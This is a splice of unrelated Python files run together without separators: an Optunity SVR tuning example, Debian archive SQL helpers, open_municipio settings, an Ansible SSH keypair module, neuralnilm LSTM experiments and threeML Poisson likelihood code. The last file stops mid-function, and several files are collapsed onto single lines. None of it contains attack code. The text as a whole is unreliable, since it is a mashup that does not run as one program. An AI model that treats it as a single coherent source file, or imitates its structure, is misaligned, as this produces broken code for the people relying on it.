    optimal_pars, _, _ = optunity.minimize(tune_cv, 200, C=[0, 10], gamma=[0, 10], pmap=optunity.pmap)
    # if you are running this in IPython, optunity.pmap will not work
    # more info at: https://github.com/claesenm/optunity/issues/8
    # comment out the above line and replace by the one below:
    # optimal_pars, _, _ = optunity.minimize(tune_cv, 150, C=[0, 10], gamma=[0, 0.1])

    tuned_model = sklearn.svm.SVR(**optimal_pars).fit(x_train, y_train)
    predictions = tuned_model.predict(x_test)
    return optunity.metrics.mse(y_test, predictions)


# decorate with cross-validation
compute_mse_tuned = outer_cv(compute_mse_tuned)
t = time.time()
mse_tuned = compute_mse_tuned()
diff = time.time() - t
print('Nested cv mean squared error of tuned model: ' + str(mse_tuned))
print('Tuning time (approx): ' + str(diff/3) + ' seconds')  # we tuned 3 times

# generate folds, so we know the indices of test instances at any point
folds = optunity.generate_folds(data.shape[0], num_folds=3)

# create another cross-validation decorator
# we will compare nested cross-validation results for both tuned and untuned models
# to do this, we will perform nested cross-validation but aggregate results using the identity function
# this will yield the predictions
outer_cv = optunity.cross_validated(x=data, y=targets, num_folds=3, folds=[folds],
                                    aggregator=optunity.cross_validation.identity)


def svr_untuned_predictions(x_train, y_train, x_test, y_test):
    model = sklearn.svm.SVR().fit(x_train, y_train)
    return model.predict(x_test).tolist()


def svr_tuned_predictions(x_train, y_train, x_test, y_test):
    @optunity.cross_validated(x=x_train, y=y_train, num_iter=2, num_folds=5)
    def tune_cv(x_train, y_train, x_test, y_test, C, gamma):
        model = sklearn.svm.SVR(C=C, gamma=gamma).fit(x_train, y_train)
        predictions = model.predict(x_test)
        return optunity.metrics.mse(y_test, predictions)

    optimal_pars, _, _ = optunity.minimize(tune_cv, 200, C=[0, 20], gamma=[0, 10], pmap=optunity.pmap)
    tuned_model = sklearn.svm.SVR(**optimal_pars).fit(x_train, y_train)
    return tuned_model.predict(x_test).tolist()


svr_untuned_predictions = outer_cv(svr_untuned_predictions)
svr_tuned_predictions = outer_cv(svr_tuned_predictions)

untuned_preds = svr_untuned_predictions()
tuned_preds = svr_tuned_predictions()

true_targets = [targets[i] for i in itertools.chain(*folds)]
untuned = list(itertools.chain(*untuned_preds))
tuned = list(itertools.chain(*tuned_preds))

#for y, u, t in zip(true_targets, untuned, tuned):
#    print(str(y) + ' :: ' + str(u) + ' :: ' + str(t))

print('plotting results')
plt.plot(range(len(true_targets)), sorted(map(lambda x, y: math.fabs(x-y), tuned, true_targets)), 'b')
plt.plot(range(len(true_targets)), sorted(map(lambda x, y: math.fabs(x-y), untuned, true_targets)), 'r')
plt.xlabel('k largest error')
plt.ylabel('absolute error')
plt.legend(['tuned model', 'default hyperparameters'])
plt.show()
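
# Illustrative follow-up sketch (an addition for clarity, not part of the
# original example): with `true_targets`, `tuned` and `untuned` assembled
# above, a scalar summary such as the mean absolute error of each model can
# be printed alongside the plot, using only names already defined here.
def _mean_absolute_error(predictions, truths):
    # average of |prediction - truth| over all outer-fold test instances
    return sum(math.fabs(p - y) for p, y in zip(predictions, truths)) / len(truths)

print('MAE of tuned model:   ' + str(_mean_absolute_error(tuned, true_targets)))
print('MAE of untuned model: ' + str(_mean_absolute_error(untuned, true_targets)))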
#!/usr/bin/python """ Helper functions for list generating commands (Packages, Sources). @contact: Debian FTP Master <[email protected]> @copyright: 2009-2011 Torsten Werner <[email protected]> @license: GNU General Public License version 2 or later """ # This program is free software; you can redistribute it and/or modify # it under the terms of the GNU General Public License as published by # the Free Software Foundation; either version 2 of the License, or # (at your option) any later version. # This program is distributed in the hope that it will be useful, # but WITHOUT ANY WARRANTY; without even the implied warranty of # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the # GNU General Public License for more details. # You should have received a copy of the GNU General Public License # along with this program; if not, write to the Free Software # Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307 USA ################################################################################ from dbconn import get_architecture def fetch(query, args, session): for (id, path, filename) in session.execute(query, args).fetchall(): yield (id, path + filename) def getSources(suite, component, session, timestamp = None): ''' Calculates the sources in suite and component optionally limited by sources newer than timestamp. Returns a generator that yields a tuple of source id and full pathname to the dsc file. See function writeSourceList() in dak/generate_filelist.py for an example that uses this function. ''' extra_cond = "" if timestamp: extra_cond = "AND extract(epoch from sa.created) > %d" % timestamp query = """ SELECT s.id, archive.path || '/pool/', c.name || '/' || f.filename FROM source s JOIN src_associations sa ON s.id = sa.source AND sa.suite = :suite %s JOIN suite ON sa.suite = suite.id JOIN archive ON suite.archive_id = archive.id JOIN files f ON s.file = f.id JOIN files_archive_map fam ON fam.file_id = f.id AND fam.component_id = :component JOIN component c ON fam.component_id = c.id ORDER BY filename """ % extra_cond args = { 'suite': suite.suite_id, 'component': component.component_id } return fetch(query, args, session) def getArchAll(suite, component, architecture, type, session, timestamp = None): ''' Calculates all binaries in suite and component of architecture 'all' (and only 'all') and type 'deb' or 'udeb' optionally limited to binaries newer than timestamp. Returns a generator that yields a tuple of binary id and full pathname to the u(deb) file. See function writeAllList() in dak/generate_filelist.py for an example that uses this function. ''' query = suite.clone(session).binaries. \ filter_by(architecture = architecture, binarytype = type) if timestamp is not None: extra_cond = 'extract(epoch from bin_associations.created) > %d' % timestamp query = query.filter(extra_cond) for binary in query: yield (binary.binary_id, binary.poolfile.fullpath) def getBinaries(suite, component, architecture, type, session, timestamp = None): ''' Calculates the binaries in suite and component of architecture and type 'deb' or 'udeb' optionally limited to binaries newer than timestamp. Returns a generator that yields a tuple of binary id and full pathname to the u(deb) file. See function writeBinaryList() in dak/generate_filelist.py for an example that uses this function. 
''' extra_cond = "" if timestamp: extra_cond = "AND extract(epoch from ba.created) > %d" % timestamp query = """ CREATE TEMP TABLE b_candidates ( id integer, source integer, file integer, architecture integer); INSERT INTO b_candidates (id, source, file, architecture) SELECT b.id, b.source, b.file, b.architecture FROM binaries b JOIN bin_associations ba ON b.id = ba.bin WHERE b.type = :type AND ba.suite = :suite AND b.architecture IN (:arch_all, :architecture) %s; CREATE TEMP TABLE gf_candidates ( id integer, filename text, path text, architecture integer, src integer, source text); INSERT INTO gf_candidates (id, filename, path, architecture, src, source) SELECT bc.id, c.name || '/' || f.filename, archive.path || '/pool/' , bc.architecture, bc.source as src, s.source FROM b_candidates bc JOIN source s ON bc.source = s.id JOIN files f ON bc.file = f.id JOIN files_archive_map fam ON f.id = fam.file_id JOIN component c ON fam.component_id = c.id JOIN archive ON fam.archive_id = archive.id JOIN suite ON suite.archive_id = archive.id WHERE c.id = :component AND suite.id = :suite; WITH arch_any AS (SELECT id, path, filename FROM gf_candidates WHERE architecture <> :arch_all), arch_all_with_any AS (SELECT id, path, filename FROM gf_candidates WHERE architecture = :arch_all AND src IN (SELECT src FROM gf_candidates WHERE architecture <> :arch_all)), arch_all_without_any AS (SELECT id, path, filename FROM gf_candidates WHERE architecture = :arch_all AND source NOT IN (SELECT DISTINCT source FROM gf_candidates WHERE architecture <> :arch_all)), filelist AS (SELECT * FROM arch_any UNION SELECT * FROM arch_all_with_any UNION SELECT * FROM arch_all_without_any) SELECT * FROM filelist ORDER BY filename """ % extra_cond args = { 'suite': suite.suite_id, 'component': component.component_id, 'architecture': architecture.arch_id, 'arch_all': get_architecture('all', session).arch_id, 'type': type } return fetch(query, args, session)
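
# Illustrative usage sketch (hypothetical caller, not part of this module):
# the generators above are meant to be consumed one tuple at a time, as the
# list writers in dak/generate_filelist.py do. Assuming a valid SQLAlchemy
# `session` plus `suite`, `component` and `architecture` ORM objects obtained
# through daklib's dbconn layer, usage would look roughly like:
#
#   for source_id, dsc_path in getSources(suite, component, session):
#       print(dsc_path)
#
#   for binary_id, deb_path in getBinaries(suite, component, architecture,
#                                          'deb', session):
#       print(deb_path)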
from open_municipio.votations.models import ChargeVote from open_municipio.acts.models import Deliberation as OMDeliberation import os from django.conf import settings MUNICIPALITY_NAME = 'Senigallia' # starting year (as a 'YYYY' string) of the municipality's current legislature MUNICIPALITY_CURRENT_LEGISLATURE = '2008' # where MDB files are located on the filesystem MDB_ROOT_DIR = os.path.join(settings.REPO_ROOT, 'test_data/votations/mdb') # where CSV files are located on the filesystem CSV_ROOT_DIR = os.path.join(settings.REPO_ROOT, 'test_data/votations/csv') # a regexp describing valid filenames for MDB files containing votation-related data MDB_SITTING_FNAME_PATTERN = r'UdinSCN(?P<sitting_id>\d{4})\.Mdb' # name of the MDB file containing data about people taking part to City Council's sittings MDB_COMPONENT_FNAME = 'UdinC%(current_legislature)s.Mdb' % {'current_legislature': MUNICIPALITY_CURRENT_LEGISLATURE} # where XML files are located on the filesystem XML_ROOT_DIR = os.path.join(settings.REPO_ROOT, 'test_data/votations/xml') ACTS_PEOPLE_FILE = os.path.join(settings.REPO_ROOT, 'test_data/acts/people.xml') # Django settings specific for the data import features XML_TO_OM_STATUS = { 'Accepted' : "APPROVED", 'Rejected' : "REJECTED", 'Presented' : "PRESENTED", } XML_TO_OM_INST = { 'SCN' : 'Consiglio comunale', 'C02' : '1^ commissione', 'C03' : '2^ commissione', 'C04' : '3^ commissione', 'C05' : '4^ commissione', 'C06' : '5^ commissione', 'C07' : '6^ commissione', } # mappings of the possible vote types XML_TO_OM_VOTE = { 'FAV' : ChargeVote.VOTES.yes, 'CON' : ChargeVote.VOTES.no, 'AST' : ChargeVote.VOTES.abstained, 'VOT' : ChargeVote.VOTES.secret, 'NVT' : ChargeVote.VOTES.canceled, 'PRE' : ChargeVote.VOTES.pres, '...' : ChargeVote.VOTES.absent, '___' : None, 'ECP' : ChargeVote.VOTES.untracked, 'ETP' : ChargeVote.VOTES.untracked, 'ELE' : ChargeVote.VOTES.untracked, 'ELG' : ChargeVote.VOTES.untracked, 'EFW' : ChargeVote.VOTES.untracked, 'ENR' : ChargeVote.VOTES.untracked, 'BDO' : ChargeVote.VOTES.untracked, 'EAB' : ChargeVote.VOTES.untracked, 'EPO' : ChargeVote.VOTES.untracked } XML_TO_OM_INITIATIVE = { 'mayor' : 'mayor', 'council_president': 'counselor', 'council_member' : 'counselor', 'alderman' : 'assessor', } OBJ_TO_OM_ACTS = { "CouncilDeliberation" : "open_municipio.acts.models.Deliberation", } VOTE_PROVIDER = None # to be specified in your municipality configuration ACTS_PROVIDER = None
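
# Illustrative sketch (hypothetical importer code, not part of these settings):
# a data-import routine is expected to translate raw XML codes through the
# mappings defined above, for example:
#
#   om_vote = XML_TO_OM_VOTE['FAV']            # -> ChargeVote.VOTES.yes
#   om_status = XML_TO_OM_STATUS['Accepted']   # -> "APPROVED"
#   om_charge = XML_TO_OM_INITIATIVE['mayor']  # -> 'mayor'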
"""Restructure data. As the original data has shuffled the data randomly, therefore it's difficult to reconstruct the exact path. Here we manually select the necessary data from raw data. Author: Yuhuang Hu Email : [email protected] """ from __future__ import print_function import os import numpy as np import rlvision import rlvision.utils as utils from rlvision.grid import GridDataSampler # import data db, imsize = utils.load_grid40(split=3) # let's have a look at data im_data = db['im_data'] value_data = db['value_data'] states = db['state_xy_data'] label_data = db['label_data'] print ("[MESSAGE] DATA LOADED") grid_sampler = GridDataSampler(im_data, value_data, imsize, states, label_data) print ("[MESSAGE] SAMPLER READY") grid, value, start_pos_list, pos_traj, goal_pos = grid_sampler.next() print (grid) print (value) print (start_pos_list) print (pos_traj) print (goal_pos) # i = 0 # while grid_sampler.grid_available: # print ("[MESSAGE] SAMPLING NEW GRID..") # grid, value, start_pos_list, pos_traj, goal_pos = grid_sampler.next() # i += 1 # print ("[MESSAGE] THE %i-TH GRID SAMPLED. %i PATH FOUND." % # (i, len(start_pos_list))) # print (i) # states_xy = [] # for i in xrange(100): # grid = np.reshape(im_data[i], imsize) # value = np.reshape(value_data[i], imsize) # goal_list = np.where(value == value.max()) # # assume the first one # goal_pos = (goal_list[0][0], goal_list[1][0]) # states_xy.append((states[i][0], states[i][1])) # # utils.plot_grid(grid, imsize, states_xy, goal_pos, title=str(i))
# -*- coding: utf-8 -*-
# Copyright 2015 Objectif Libre
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
#     http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
#
import collections

from django.conf import settings
from horizon.utils.memoized import memoized  # noqa
from keystoneauth1.identity.v3 import Token

from cloudkittyclient import client as ck_client

from cloudkittydashboard import utils


@memoized
def cloudkittyclient(request):
    """Initialization of Cloudkitty client."""
    cacert = getattr(settings, 'OPENSTACK_SSL_CACERT', None)
    insecure = getattr(settings, 'OPENSTACK_SSL_NO_VERIFY', False)
    auth_url = getattr(settings, 'OPENSTACK_KEYSTONE_URL', None)
    auth = Token(
        auth_url,
        token=request.user.token.id,
        project_id=request.user.project_id,
        domain_id=request.user.domain_id,
    )
    adapter_options = {
        'region_name': request.user.services_region,
    }
    return ck_client.Client(
        '1',
        auth=auth,
        cacert=cacert,
        insecure=insecure,
        adapter_options=adapter_options,
    )


def identify(what, name=False, key=None):
    """Populate 'id' (and optionally 'name') from the "<key>_id" field,
    wrapping the result(s) in utils.TemplatizableDict for use in templates.
    """
    if isinstance(what, collections.Iterable):
        for i in what:
            i['id'] = i.get(key or "%s_id" % i['key'])
            if name and not i.get('name'):
                i['name'] = i.get(key or "%s_id" % i['key'])
        what = [utils.TemplatizableDict(i) for i in what]
    else:
        what['id'] = what.get(key or "%s_id" % what['key'])
        if name and not what.get('name'):
            what['name'] = what.get(key or "%s_id" % what['key'])
        what = utils.TemplatizableDict(what)
    return what
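
# Illustrative sketch (assumed sample data, not part of the module): identify()
# mirrors the "<key>_id" field into 'id' (and optionally 'name') so templates
# can address API results uniformly, e.g.
#
#   services = [{'key': 'service', 'service_id': 'compute'}]
#   identify(services, name=True)
#   # -> [TemplatizableDict({'key': 'service', 'service_id': 'compute',
#   #                        'id': 'compute', 'name': 'compute'})]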
#!/usr/bin/python # -*- coding: utf-8 -*- # (c) 2018, David Kainz <[email protected]> <[email protected]> # GNU General Public License v3.0+ (see COPYING or https://www.gnu.org/licenses/gpl-3.0.txt) from __future__ import absolute_import, division, print_function __metaclass__ = type ANSIBLE_METADATA = { 'metadata_version': '1.1', 'status': ['preview'], 'supported_by': 'community' } DOCUMENTATION = ''' --- module: openssh_keypair author: "David Kainz (@lolcube)" version_added: "2.8" short_description: Generate OpenSSH private and public keys. description: - "This module allows one to (re)generate OpenSSH private and public keys. It uses ssh-keygen to generate keys. One can generate C(rsa), C(dsa), C(rsa1), C(ed25519) or C(ecdsa) private keys." requirements: - "ssh-keygen" options: state: required: false default: present choices: [ present, absent ] description: - Whether the private and public keys should exist or not, taking action if the state is different from what is stated. size: required: false description: - "Specifies the number of bits in the private key to create. For RSA keys, the minimum size is 1024 bits and the default is 4096 bits. Generally, 2048 bits is considered sufficient. DSA keys must be exactly 1024 bits as specified by FIPS 186-2. For ECDSA keys, size determines the key length by selecting from one of three elliptic curve sizes: 256, 384 or 521 bits. Attempting to use bit lengths other than these three values for ECDSA keys will cause this module to fail. Ed25519 keys have a fixed length and the size will be ignored." type: required: false default: rsa choices: ['rsa', 'dsa', 'rsa1', 'ecdsa', 'ed25519'] description: - "The algorithm used to generate the SSH private key. C(rsa1) is for protocol version 1. C(rsa1) is deprecated and may not be supported by every version of ssh-keygen." force: required: false default: false type: bool description: - Should the key be regenerated even if it already exists path: required: true description: - Name of the files containing the public and private key. The file containing the public key will have the extension C(.pub). comment: required: false description: - Provides a new comment to the public key. When checking if the key is in the correct state this will be ignored. extends_documentation_fragment: files ''' EXAMPLES = ''' # Generate an OpenSSH keypair with the default values (4096 bits, rsa) - openssh_keypair: path: /tmp/id_ssh_rsa # Generate an OpenSSH rsa keypair with a different size (2048 bits) - openssh_keypair: path: /tmp/id_ssh_rsa size: 2048 # Force regenerate an OpenSSH keypair if it already exists - openssh_keypair: path: /tmp/id_ssh_rsa force: True # Generate an OpenSSH keypair with a different algorithm (dsa) - openssh_keypair: path: /tmp/id_ssh_dsa type: dsa ''' RETURN = ''' size: description: Size (in bits) of the SSH private key returned: changed or success type: int sample: 4096 type: description: Algorithm used to generate the SSH private key returned: changed or success type: string sample: rsa filename: description: Path to the generated SSH private key file returned: changed or success type: string sample: /tmp/id_ssh_rsa fingerprint: description: The fingerprint of the key. 
returned: changed or success type: string sample: 4096 SHA256:r4YCZxihVjedH2OlfjVGI6Y5xAYtdCwk8VxKyzVyYfM [email protected] (RSA) ''' import os import errno from ansible.module_utils.basic import AnsibleModule from ansible.module_utils._text import to_native class KeypairError(Exception): pass class Keypair(object): def __init__(self, module): self.path = module.params['path'] self.state = module.params['state'] self.force = module.params['force'] self.size = module.params['size'] self.type = module.params['type'] self.comment = module.params['comment'] self.changed = False self.check_mode = module.check_mode self.privatekey = None self.fingerprint = {} if self.type in ('rsa', 'rsa1'): self.size = 4096 if self.size is None else self.size if self.size < 1024: module.fail_json(msg=('For RSA keys, the minimum size is 1024 bits and the default is 4096 bits. ' 'Attempting to use bit lengths under 1024 will cause the module to fail.')) if self.type == 'dsa': self.size = 1024 if self.size is None else self.size if self.size != 1024: module.fail_json(msg=('DSA keys must be exactly 1024 bits as specified by FIPS 186-2.')) if self.type == 'ecdsa': self.size = 256 if self.size is None else self.size if self.size not in (256, 384, 521): module.fail_json(msg=('For ECDSA keys, size determines the key length by selecting from ' 'one of three elliptic curve sizes: 256, 384 or 521 bits. ' 'Attempting to use bit lengths other than these three values for ' 'ECDSA keys will cause this module to fail. ')) if self.type == 'ed25519': self.size = 256 def generate(self, module): # generate a keypair if not self.isValid(module, perms_required=False) or self.force: args = [ module.get_bin_path('ssh-keygen', True), '-q', '-N', '', '-b', str(self.size), '-t', self.type, '-f', self.path, ] if self.comment: args.extend(['-C', self.comment]) else: args.extend(['-C', ""]) try: self.changed = True module.run_command(args) proc = module.run_command([module.get_bin_path('ssh-keygen', True), '-lf', self.path]) self.fingerprint = proc[1].split() except Exception as e: self.remove() module.fail_json(msg="%s" % to_native(e)) file_args = module.load_file_common_arguments(module.params) if module.set_fs_attributes_if_different(file_args, False): self.changed = True def isValid(self, module, perms_required=True): # check if the key is correct def _check_state(): return os.path.exists(self.path) if _check_state(): proc = module.run_command([module.get_bin_path('ssh-keygen', True), '-lf', self.path]) fingerprint = proc[1].split() keysize = int(fingerprint[0]) keytype = fingerprint[-1][1:-1].lower() else: return False def _check_perms(module): file_args = module.load_file_common_arguments(module.params) return not module.set_fs_attributes_if_different(file_args, False) def _check_type(): return self.type == keytype def _check_size(): return self.size == keysize self.fingerprint = fingerprint if not perms_required: return _check_state() and _check_type() and _check_size() return _check_state() and _check_perms(module) and _check_type() and _check_size() def dump(self): # return result as a dict """Serialize the object into a dictionary.""" result = { 'changed': self.changed, 'size': self.size, 'type': self.type, 'filename': self.path, 'fingerprint': self.fingerprint, } return result def remove(self): """Remove the resource from the filesystem.""" try: os.remove(self.path) self.changed = True except OSError as exc: if exc.errno != errno.ENOENT: raise KeypairError(exc) else: pass if os.path.exists(self.path + ".pub"): try: 
os.remove(self.path + ".pub") self.changed = True except OSError as exc: if exc.errno != errno.ENOENT: raise KeypairError(exc) else: pass def main(): # Define Ansible Module module = AnsibleModule( argument_spec=dict( state=dict(default='present', choices=['present', 'absent'], type='str'), size=dict(type='int'), type=dict(default='rsa', choices=['rsa', 'dsa', 'rsa1', 'ecdsa', 'ed25519'], type='str'), force=dict(default=False, type='bool'), path=dict(required=True, type='path'), comment=dict(type='str'), ), supports_check_mode=True, add_file_common_args=True, ) # Check if Path exists base_dir = os.path.dirname(module.params['path']) if not os.path.isdir(base_dir): module.fail_json( name=base_dir, msg='The directory %s does not exist or the file is not a directory' % base_dir ) keypair = Keypair(module) if keypair.state == 'present': if module.check_mode: result = keypair.dump() result['changed'] = module.params['force'] or not keypair.isValid(module) module.exit_json(**result) try: keypair.generate(module) except Exception as exc: module.fail_json(msg=to_native(exc)) else: if module.check_mode: keypair.changed = os.path.exists(module.params['path']) if keypair.changed: keypair.fingerprint = {} result = keypair.dump() module.exit_json(**result) try: keypair.remove() except Exception as exc: module.fail_json(msg=to_native(exc)) result = keypair.dump() module.exit_json(**result) if __name__ == '__main__': main()
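# Illustrative note (an assumption, not part of the module): the fingerprint
# stored by Keypair comes from splitting one line of ``ssh-keygen -lf <path>``
# output, for example:
#
#   "4096 SHA256:r4YCZxihVjed... [email protected] (RSA)"
#
# so that fields[0] is the key size compared against self.size, and
# fields[-1][1:-1].lower() is the key type ("rsa") compared against self.type
# in isValid().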
from __future__ import print_function, division import matplotlib matplotlib.use('Agg') # Must be before importing matplotlib.pyplot or pylab! from neuralnilm import Net, RealApplianceSource, BLSTMLayer, SubsampleLayer, DimshuffleLayer from lasagne.nonlinearities import sigmoid, rectify from lasagne.objectives import crossentropy, mse from lasagne.init import Uniform, Normal from lasagne.layers import LSTMLayer, DenseLayer, Conv1DLayer, ReshapeLayer from lasagne.updates import adagrad, nesterov_momentum from functools import partial import os from neuralnilm.source import standardise from neuralnilm.experiment import run_experiment from neuralnilm.net import TrainingError import __main__ NAME = os.path.splitext(os.path.split(__main__.__file__)[1])[0] PATH = "/homes/dk3810/workspace/python/neuralnilm/figures" SAVE_PLOT_INTERVAL = 250 GRADIENT_STEPS = 100 """ e103 Discovered that bottom layer is hardly changing. So will try just a single lstm layer e104 standard init lower learning rate e106 lower learning rate to 0.001 e108 is e107 but with batch size of 5 e109 Normal(1) for LSTM e110 * Back to Uniform(5) for LSTM * Using nntools eb17bd923ef9ff2cacde2e92d7323b4e51bb5f1f """ def exp_a(name): source = RealApplianceSource( filename='/data/dk3810/ukdale.h5', appliances=[ ['fridge freezer', 'fridge', 'freezer'], 'hair straighteners', 'television' # 'dish washer', # ['washer dryer', 'washing machine'] ], max_appliance_powers=[300, 500, 200], #, 2500, 2400], on_power_thresholds=[20, 20, 20], #, 20, 20], max_input_power=1000, min_on_durations=[60, 60, 60], #, 1800, 1800], window=("2013-06-01", "2014-07-01"), seq_length=1000, output_one_appliance=False, boolean_targets=False, min_off_duration=60, train_buildings=[1], validation_buildings=[1], skip_probability=0, n_seq_per_batch=5 ) net = Net( experiment_name=name, source=source, save_plot_interval=SAVE_PLOT_INTERVAL, loss_function=crossentropy, updates=partial(nesterov_momentum, learning_rate=0.1), layers_config=[ { 'type': DenseLayer, 'num_units': 50, 'nonlinearity': sigmoid, 'b': Uniform(25), 'W': Uniform(25) }, { 'type': DenseLayer, 'num_units': 50, 'nonlinearity': sigmoid, 'b': Uniform(10), 'W': Uniform(10) }, { 'type': LSTMLayer, 'num_units': 50, 'W_in_to_cell': Uniform(5), 'gradient_steps': GRADIENT_STEPS }, { 'type': DenseLayer, 'num_units': source.n_outputs, 'nonlinearity': sigmoid } ] ) return net def exp_b(name): # as above but without gradient_steps source = RealApplianceSource( filename='/data/dk3810/ukdale.h5', appliances=[ ['fridge freezer', 'fridge', 'freezer'], 'hair straighteners', 'television' # 'dish washer', # ['washer dryer', 'washing machine'] ], max_appliance_powers=[300, 500, 200], #, 2500, 2400], on_power_thresholds=[20, 20, 20], #, 20, 20], max_input_power=1000, min_on_durations=[60, 60, 60], #, 1800, 1800], window=("2013-06-01", "2014-07-01"), seq_length=1000, output_one_appliance=False, boolean_targets=False, min_off_duration=60, train_buildings=[1], validation_buildings=[1], skip_probability=0, n_seq_per_batch=5 ) net = Net( experiment_name=name, source=source, save_plot_interval=SAVE_PLOT_INTERVAL, loss_function=crossentropy, updates=partial(nesterov_momentum, learning_rate=0.1), layers_config=[ { 'type': DenseLayer, 'num_units': 50, 'nonlinearity': sigmoid, 'b': Uniform(25), 'W': Uniform(25) }, { 'type': DenseLayer, 'num_units': 50, 'nonlinearity': sigmoid, 'b': Uniform(10), 'W': Uniform(10) }, { 'type': LSTMLayer, 'num_units': 50, 'W_in_to_cell': Uniform(5) }, { 'type': DenseLayer, 'num_units': source.n_outputs, 
'nonlinearity': sigmoid } ] ) return net def exp_c(name): # Same as above but with learning rate = 0.01 source = RealApplianceSource( filename='/data/dk3810/ukdale.h5', appliances=[ ['fridge freezer', 'fridge', 'freezer'], 'hair straighteners', 'television' # 'dish washer', # ['washer dryer', 'washing machine'] ], max_appliance_powers=[300, 500, 200], #, 2500, 2400], on_power_thresholds=[20, 20, 20], #, 20, 20], max_input_power=1000, min_on_durations=[60, 60, 60], #, 1800, 1800], window=("2013-06-01", "2014-07-01"), seq_length=1000, output_one_appliance=False, boolean_targets=False, min_off_duration=60, train_buildings=[1], validation_buildings=[1], skip_probability=0, n_seq_per_batch=5 ) net = Net( experiment_name=name, source=source, save_plot_interval=SAVE_PLOT_INTERVAL, loss_function=crossentropy, updates=partial(nesterov_momentum, learning_rate=0.01), layers_config=[ { 'type': DenseLayer, 'num_units': 50, 'nonlinearity': sigmoid, 'b': Uniform(25), 'W': Uniform(25) }, { 'type': DenseLayer, 'num_units': 50, 'nonlinearity': sigmoid, 'b': Uniform(10), 'W': Uniform(10) }, { 'type': LSTMLayer, 'num_units': 50, 'W_in_to_cell': Uniform(5), 'gradient_steps': GRADIENT_STEPS }, { 'type': DenseLayer, 'num_units': source.n_outputs, 'nonlinearity': sigmoid } ] ) return net def exp_d(name): # Same as above but with learning rate = 0.001 source = RealApplianceSource( filename='/data/dk3810/ukdale.h5', appliances=[ ['fridge freezer', 'fridge', 'freezer'], 'hair straighteners', 'television' # 'dish washer', # ['washer dryer', 'washing machine'] ], max_appliance_powers=[300, 500, 200], #, 2500, 2400], on_power_thresholds=[20, 20, 20], #, 20, 20], max_input_power=1000, min_on_durations=[60, 60, 60], #, 1800, 1800], window=("2013-06-01", "2014-07-01"), seq_length=1000, output_one_appliance=False, boolean_targets=False, min_off_duration=60, train_buildings=[1], validation_buildings=[1], skip_probability=0, n_seq_per_batch=5 ) net = Net( experiment_name=name, source=source, save_plot_interval=SAVE_PLOT_INTERVAL, loss_function=crossentropy, updates=partial(nesterov_momentum, learning_rate=0.001), layers_config=[ { 'type': DenseLayer, 'num_units': 50, 'nonlinearity': sigmoid, 'b': Uniform(25), 'W': Uniform(25) }, { 'type': DenseLayer, 'num_units': 50, 'nonlinearity': sigmoid, 'b': Uniform(10), 'W': Uniform(10) }, { 'type': LSTMLayer, 'num_units': 50, 'W_in_to_cell': Uniform(5), 'gradient_steps': GRADIENT_STEPS }, { 'type': DenseLayer, 'num_units': source.n_outputs, 'nonlinearity': sigmoid } ] ) return net def init_experiment(experiment): full_exp_name = NAME + experiment func_call = 'exp_{:s}(full_exp_name)'.format(experiment) print("***********************************") print("Preparing", full_exp_name, "...") net = eval(func_call) return net def main(): for experiment in list('bcd'): full_exp_name = NAME + experiment path = os.path.join(PATH, full_exp_name) try: net = init_experiment(experiment) run_experiment(net, path, epochs=5000) except KeyboardInterrupt: break except TrainingError as e: print("EXCEPTION:", e) if __name__ == "__main__": main()
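# Note (illustration only): main() above only sweeps experiments 'b', 'c' and
# 'd'; exp_a can be run on its own in the same way, e.g.:
#
#   net = init_experiment('a')
#   run_experiment(net, os.path.join(PATH, NAME + 'a'), epochs=5000)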
import numpy as np from threeML.plugins.gammaln import logfactorial from math import log def regularized_log(vector): """ A function which is log(vector) where vector > 0, and zero otherwise. :param vector: :return: """ return np.where(vector > 0, np.log(vector), 0) def xlogy(x, y): """ A function which is 0 if x is 0, and x * log(y) otherwise. This is to fix the fact that for a machine 0 * log(inf) is nan, instead of 0. :param x: :param y: :return: """ return np.where(x > 0, x * np.log(y), 0) def poisson_log_likelihood_ideal_bkg(observed_counts, expected_bkg_counts, expected_model_counts): """ Poisson log-likelihood for the case where the background has no uncertainties: L = \sum_{i=0}^{N}~o_i~\log{(m_i + b_i)} - (m_i + b_i) - \log{o_i!} :param observed_counts: :param expected_bkg_counts: :param expected_model_counts: :return: (log_like vector, background vector) """ # Model predicted counts # In this likelihood the background becomes part of the model, which means that # the uncertainty in the background is completely neglected predicted_counts = expected_bkg_counts + expected_model_counts log_likes = observed_counts * np.log(predicted_counts + 1e-100) - predicted_counts - \ logfactorial(observed_counts) return log_likes, expected_bkg_counts def poisson_observed_poisson_background_xs(observed_counts, background_counts, exposure_ratio, expected_model_counts): """ Profile log-likelihood for the case when the observed counts are Poisson distributed, and the background counts are Poisson distributed as well (typical for X-ray analysis with aperture photometry). This has been derived by Keith Arnaud (see the Xspec manual, Wstat statistic) """ # We follow Arnaud et al. (Xspec manual) in the computation, which means that at the end we need to multiply by # (-1) as he computes the -log(L), while we need log(L). Also, he multiplies -log(L) by 2 at the end to make it # converge to chisq^2. We don't do that to keep it a proper (profile) likelihood. # Compute the nuisance background parameter first_term = exposure_ratio * (observed_counts + background_counts) - (1 + exposure_ratio) * expected_model_counts second_term = np.sqrt(first_term ** 2 + 4 * exposure_ratio * (exposure_ratio + 1) * background_counts * expected_model_counts) background_nuisance_parameter = (first_term + second_term) / (2 * exposure_ratio * (exposure_ratio + 1)) first_term = expected_model_counts + (1 + exposure_ratio) * background_nuisance_parameter # we regularize the log so it will not give NaN if expected_model_counts and background_nuisance_parameter are both # zero. For any good model this should also mean observed_counts = 0, btw. second_term = - xlogy(observed_counts, expected_model_counts + exposure_ratio * background_nuisance_parameter) third_term = - xlogy(background_counts, background_nuisance_parameter) ppstat = 2 * (first_term + second_term + third_term) ppstat += 2 * (- observed_counts + xlogy(observed_counts, observed_counts) - background_counts + xlogy(background_counts, background_counts)) # assert np.isfinite(ppstat).all() return ppstat * (-1) def poisson_observed_poisson_background(observed_counts, background_counts, exposure_ratio, expected_model_counts): # TODO: check this with simulations # Just a name change to make writing formulas a little easier alpha = exposure_ratio b = background_counts o = observed_counts M = expected_model_counts # Nuisance parameter for Poisson likelihood # NOTE: B_mle is zero when b is zero! 
